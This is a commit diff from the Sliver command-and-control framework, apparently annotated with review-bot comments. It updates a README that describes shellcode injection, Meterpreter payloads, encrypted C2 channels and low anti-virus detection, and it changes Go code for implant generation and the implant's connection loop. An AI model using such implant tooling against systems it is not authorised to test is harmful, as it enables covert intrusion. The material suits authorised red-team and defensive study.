Merge branch 'master' into execute-assembly
rkervella committed Feb 20, 2019
2 parents 05be658 + 80603d7 commit 1dd85c9
Showing 4 changed files with 54 additions and 19 deletions.
33 changes: 23 additions & 10 deletions README.md
@@ -5,21 +5,34 @@ Sliver

Sliver is a remote shellcode loading and injection service that uses end-to-end encryption (mTLS) for all network traffic. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver can load arbitrary shellcode but also integrates with MSFVenom to automatically generate, execute, and manage Meterpreter payloads. Sliver binaries have very low anti-virus detection as they do not contain any malicous code themselves and instead dynamically load it over the network.

Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access.
Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access.

```
[attacker] <-(mTLS)-> [sliver] -(code injection)-> [remote process]
```
### Feature Progess

Sliver is designed to be secure-by-default and have as few dependancies as possible.
#### C2
- [x] Mutual TLS
- [x] Encrypted DNS
- [ ] HTTP(S)
- [ ] ICMP

### Setup
#### Chain Loader
- [x] Raw Shellcode
- [x] .NET Assemblies
- [x] Metasploit/Meterpreter (v5 or later)
- [ ] Empire
- [ ] Cobalt Strike

1. Install Metasploit Framework v5 or later (if you want to use MSF features)
2. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary
3. ???
4. Shellz
#### Post Exploitation
- [x] Windows Token Manipulation
- [x] Procdump
- [ ] TCP tunnels
- [ ] Reverse SOCKS proxy

### Setup

1. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary
2. ???
3. Shellz

## Compile From Source
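Review bot: The heading `### Feature Progess` is misspelled (Progress), and the shorter Setup list no longer carries the "Install Metasploit Framework v5 or later" step even though the Chain Loader checklist still names Metasploit/Meterpreter (v5 or later). Keep the optional MSF prerequisite in Setup, or point to it from the checklist, so the dependency is not documented only as a feature item. The injection sentence touched in this hunk still reads "it's own process" and "a remote processes"; fix both while the line is being changed.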

28 changes: 22 additions & 6 deletions client/command/sliver.go
@@ -180,8 +180,8 @@ func info(ctx *grumble.Context, rpc RPCServer) {
}

func generate(ctx *grumble.Context, rpc RPCServer) {
targetOS := ctx.Flags.String("os")
arch := ctx.Flags.String("arch")
targetOS := strings.ToLower(ctx.Flags.String("os"))
arch := strings.ToLower(ctx.Flags.String("arch"))
lhost := ctx.Flags.String("lhost")
lport := ctx.Flags.Int("lport")
debug := ctx.Flags.Bool("debug")
@@ -194,13 +194,29 @@ func generate(ctx *grumble.Context, rpc RPCServer) {

save := ctx.Flags.String("save")

if lhost == "" {
fmt.Printf(Warn+"Invalid lhost '%s'\n", lhost)
/* For UX we convert some synonymous terms */
if targetOS == "mac" || targetOS == "macos" || targetOS == "m" {
targetOS = "darwin"
}
if targetOS == "win" || targetOS == "w" || targetOS == "shit" {
targetOS = "windows"
}
if targetOS == "unix" || targetOS == "l" {
targetOS = "linux"
}
if arch == "x64" || strings.HasPrefix(arch, "64") {
arch = "amd64"
}
if arch == "x86" || strings.HasPrefix(arch, "32") {
arch = "386"
}

if lhost == "" && dnsParent == "" {
fmt.Printf(Warn + "Must specify --lhost or --dns\n")
return
}
if save == "" {
fmt.Printf(Warn + "Save path required (--save)\n")
return
save, _ = os.Getwd()
}

// Make sure we have the FQDN
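Review bot: In the `if save == ""` branch, `save, _ = os.Getwd()` discards the error, so a failed lookup leaves `save` empty and the code below carries on with no output path; check the error and return with a warning, as the old branch did. The alias block also maps `"shit"` to `windows`, which should not ship in a user-facing CLI. After normalization nothing rejects an unrecognized `targetOS` or `arch`: for example `x86_64` matches neither `arch == "x64"` nor the `"64"` prefix test and passes through unchanged. Validate both values against the supported set and print the accepted values on failure.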
3 changes: 1 addition & 2 deletions server/console/console-players.go
@@ -74,8 +74,7 @@ func newPlayerCmd(ctx *grumble.Context) {
}

if save == "" {
fmt.Printf(Warn + "Save file required (--save)\n")
return
save, _ = os.Getwd()
}

fmt.Printf(Info + "Generating new client certificate, please wait ... \n")
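Review bot: `save, _ = os.Getwd()` replaces a check whose message asked for a save file, but `os.Getwd()` returns a directory, and its error is dropped. Since the next step generates a client certificate, handle the error explicitly, confirm the code that writes the output accepts a directory here, and print the resolved path so the operator knows where the credential material was written instead of it landing silently in the current working directory.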
9 changes: 8 additions & 1 deletion sliver/sliver.go
@@ -3,7 +3,10 @@ package main
import (
"crypto/x509"
"flag"

// {{if .MTLSServer}}
"io"
// {{end}}
"os"
"os/user"
"runtime"
@@ -71,13 +74,17 @@ func startConnectionLoop() {
// {{end}}
connectionAttempts := 0
for connectionAttempts < maxErrors {
err := mtlsConnect()
var err error

// {{if .MTLSServer}}
err = mtlsConnect()
if err != nil {
// {{if .Debug}}
log.Printf("[mtls] Connection failed %s", err)
// {{end}}
}
connectionAttempts++
// {{end}}

// {{if .DNSParent}}
if dnsParent != "" {
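Review bot: `connectionAttempts++` now sits inside the `// {{if .MTLSServer}}` block, so when the file is rendered without MTLSServer nothing visible in this hunk advances the counter that bounds `for connectionAttempts < maxErrors`. Move the increment outside the template guard, or increment once per iteration regardless of transport, so the loop bound holds for every build variant. Also confirm `var err error` is used in every rendered variant, since Go rejects unused local variables.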